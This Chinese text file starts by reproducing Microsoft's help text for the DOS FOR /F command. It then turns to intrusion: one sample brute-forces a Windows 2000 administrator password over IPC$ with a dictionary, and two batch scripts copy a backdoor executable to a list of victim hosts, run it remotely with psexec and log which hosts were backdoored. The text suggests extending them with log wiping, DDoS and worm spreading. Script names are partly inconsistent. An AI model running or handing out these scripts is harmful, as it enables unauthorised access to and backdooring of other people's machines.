dos.txt

帮助大家熟悉DOS

      FOR /F ["options"] %variable IN (file-set) DO command 

      FOR /F ["options"] %variable IN ("string") DO command 

      FOR /F ["options"] %variable IN (command) DO command 

 

      filenameset 为一个或多个文件名。继续到 filenameset 中的 

      下一个文件之前，每份文件都已被打开、读取并经过处理。 

      处理包括读取文件，将其分成一行行的文字，然后将每行 

      解析成零或更多的符号。然后用已找到的符号字符串变量值 

      调用 For 循环。以默认方式，/F 通过每个文件的每一行中分开 

      的第一个空白符号。跳过空白行。您可通过指定可选 "options" 

      参数替代默认解析操作。这个带引号的字符串包括一个或多个 

      指定不同解析选项的关键字。这些关键字为: 

 

      eol=c - 指一个行注释字符的结尾(就一个) 

      skip=n - 指在文件开始时忽略的行数。 

      delims=xxx - 指分隔符集。这个替换了空格和跳格键的 

      默认分隔符集。 

      tokens=x,y,m-n - 指每行的哪一个符号被传递到每个迭代 

      的 for 本身。这会导致额外变量名称的 

      格式为一个范围。通过 nth 符号指定 m 

      符号字符串中的最后一个字符星号， 

      那么额外的变量将在最后一个符号解析之 

      分配并接受行的保留文本。 

      usebackq - 指定新语法已在下类情况中使用: 

      在作为命令执行一个后引号的字符串并且 

      引号字符为文字字符串命令并允许在 fi 

      中使用双引号扩起文件名称。 

 

 

      sample1: 

      FOR /F "eol=; tokens=2,3* delims=, " %i in (myfile.txt) do command 

 

      会分析 myfile.txt 中的每一行，忽略以分号打头的那些行，将 

      每行中的第二个和第三个符号传递给 for 程序体；用逗号和/或 

      空格定界符号。请注意，这个 for 程序体的语句引用 %i 来 

      取得第二个符号，引用 %j 来取得第三个符号，引用 %k 

      来取得第三个符号后的所有剩余符号。对于带有空格的文件 

      名，您需要用双引号将文件名括起来。为了用这种方式来使 

      用双引号，您还需要使用 usebackq 选项，否则，双引号会 

      被理解成是用作定义某个要分析的字符串的。 

 

      %i 专门在 for 语句中得到说明，%j 和 %k 是通过 

      tokens= 选项专门得到说明的。您可以通过 tokens= 一行 

      指定最多 26 个符号，只要不试图说明一个高于字母 z 或 

      Z 的变量。请记住，FOR 变量是单一字母、分大小写和全局的； 

      同时不能有 52 个以上都在使用中。 

 

      您还可以在相邻字符串上使用 FOR /F 分析逻辑；方法是， 

      用单引号将括号之间的 filenameset 括起来。这样，该字符 

      串会被当作一个文件中的一个单一输入行。 

 

      最后，您可以用 FOR /F 命令来分析命令的输出。方法是，将 

      括号之间的 filenameset 变成一个反括字符串。该字符串会 

      被当作命令行，传递到一个子 CMD.EXE，其输出会被抓进 

      内存，并被当作文件分析。因此，以下例子: 

 

      FOR /F "usebackq delims==" %i IN (`set`) DO @echo %i 

 

      会枚举当前环境中的环境变量名称。 

 

      另外，FOR 变量参照的替换已被增强。您现在可以使用下列 

      选项语法: 

 

      ~I - 删除任何引号(")，扩充 %I 

      %~fI - 将 %I 扩充到一个完全合格的路径名 

      %~dI - 仅将 %I 扩充到一个驱动器号 

      %~pI - 仅将 %I 扩充到一个路径 

      %~nI - 仅将 %I 扩充到一个文件名 

      %~xI - 仅将 %I 扩充到一个文件扩展名 

      %~sI - 扩充的路径只含有短名 

      %~aI - 将 %I 扩充到文件的文件属性 

      %~tI - 将 %I 扩充到文件的日期/时间 

      %~zI - 将 %I 扩充到文件的大小 

      %~$PATH:I - 查找列在路径环境变量的目录，并将 %I 扩充 

      到找到的第一个完全合格的名称。如果环境变量 

      未被定义，或者没有找到文件，此组合键会扩充 

      空字符串 

 

      可以组合修饰符来得到多重结果: 

 

      %~dpI - 仅将 %I 扩充到一个驱动器号和路径 

      %~nxI - 仅将 %I 扩充到一个文件名和扩展名 

      %~fsI - 仅将 %I 扩充到一个带有短名的完整路径名 

      %~dp$PATH:i - 查找列在路径环境变量的目录，并将 %I 扩充 

      到找到的第一个驱动器号和路径。 

      %~ftzaI - 将 %I 扩充到类似输出线路的 DIR 

 

      在以上例子中，%I 和 PATH 可用其他有效数值代替。%~ 语法 

      用一个有效的 FOR 变量名终止。选取类似 %I 的大写变量名 

      比较易读，而且避免与不分大小写的组合键混淆。 

 

      以上是MS的官方帮助，下面我们举几个例子来具体说明一下For命令在入侵中的用途。 

 

 

      sample2： 

 

      利用For命令来实现对一台目标Win2k主机的暴力密码破解。 

      我们用net use \\ip\ipc$ "password" /u:"administrator"来尝试这和目标主机进行连接，当成功时记下密码。 

      最主要的命令是一条：for /f i% in (dict.txt) do net use \\ip\ipc$ "i%" 
      /u:"administrator" 

      用i%来表示admin的密码，在dict.txt中这个取i%的值用net use 命令来连接。然后将程序运行结果传递给find命令－－ 

      for /f i%% in (dict.txt) do net use \\ip\ipc$ "i%%" 
      /u:"administrator"|find ":命令成功完成">>D:\ok.txt ，这样就ko了。 

 

 

      sample3： 

 

      你有没有过手里有大量肉鸡等着你去种后门＋木马呢？，当数量特别多的时候，原本很开心的一件事都会变得很郁闷：）。文章开头就谈到使用批处理文件，可以简化日常或重复性任务。那么如何实现呢？呵呵，看下去你就会明白了。 

 


      主要命令也只有一条：（在批处理文件中使用 FOR 命令时，指定变量使用 %%variable） 

      @for /f "tokens=1,2,3 delims= " %%i in (victim.txt) do start call door.bat 
      %%i %%j %%k 

      tokens的用法请参见上面的sample1，在这里它表示按顺序将victim.txt中的内容传递给door.bat中的参数%i %j %k。 

      而cultivate.bat无非就是用net use命令来建立IPC$连接，并copy木马＋后门到victim，然后用返回码（If 
      errorlever =）来筛选成功种植后门的主机，并echo出来，或者echo到指定的文件。 

      delims= 表示vivtim.txt中的内容是一空格来分隔的。我想看到这里你也一定明白这victim.txt里的内容是什么样的了。应该根据%%i 
      %%j %%k表示的对象来排列，一般就是 ip password username。 

      代码雏形： 

 

      --------------- cut here then save as a batchfile(I call it main.bat ) 
      --------------------------- 

      @echo off 

      @if "%1"=="" goto usage 

      @for /f "tokens=1,2,3 delims= " %%i in (victim.txt) do start call 
      IPChack.bat %%i %%j %%k 

      @goto end 

      :usage 

      @echo run this batch in dos modle.or just double-click it. 

      :end 

      --------------- cut here then save as a batchfile(I call it main.bat ) 
      --------------------------- 

 

 

      ------------------- cut here then save as a batchfile(I call it door.bat) 
      ----------------------------- 

      @net use \\%1\ipc$ %3 /u:"%2" 

      @if errorlevel 1 goto failed 

      @echo Trying to establish the IPC$ connection …………OK 

      @copy windrv32.exe\\%1\admin$\system32 && if not errorlevel 1 echo IP %1 
      USER %2 PWD %3 >>ko.txt 

      @p***ec \\%1 c:\winnt\system32\windrv32.exe 

      @p***ec \\%1 net start windrv32 && if not errorlevel 1 echo %1 Backdoored 
      >>ko.txt 

      :failed 

      @echo Sorry can not connected to the victim. 

      ----------------- cut here then save as a batchfile(I call it door.bat) 
      -------------------------------- 

      这只是一个自动种植后门批处理的雏形，两个批处理和后门程序（Windrv32.exe）,PSexec.exe需放在统一目录下.批处理内容 

      尚可扩展,例如:加入清除日志+DDOS的功能,加入定时添加用户的功能,更深入一点可以使之具备自动传播功能(蠕虫).此处不多做叙述,有兴趣的朋友可自行研究.